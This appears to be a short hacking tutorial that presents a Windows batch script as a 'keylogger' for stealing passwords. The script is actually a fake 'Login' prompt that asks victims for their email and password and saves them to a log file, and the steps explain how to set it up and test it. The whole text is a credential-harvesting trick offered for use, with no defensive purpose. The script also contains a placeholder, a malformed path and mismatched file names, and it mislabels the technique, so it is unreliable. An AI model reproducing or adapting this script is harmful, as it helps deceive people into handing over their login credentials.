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How to create Keylogger using Notepad for hacking ?

Keylogger is an computer program program that records every keystroke made by a computer user ,especially in order to gain fraudulent acess to passwords and other confidential information.
use the following steps :
Step 1:
    First of all open notepad and type the following code :

@echo off
color a
title Login
echo Please Enter Your Email Address And Password
echo %date% >> Log.txt

set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
cd “C:Logs”

Step 2:
Now save the file as logs.bat on your desktop :
Step 3:
  Now create a new folder named logs.(you must keep the name logs otherwise it won't work)
 Cut the folder and paste to C drive .

Step 4:
test the log.bat by opening it.
and open the folder and you will see the automatically saved logs in the folder.
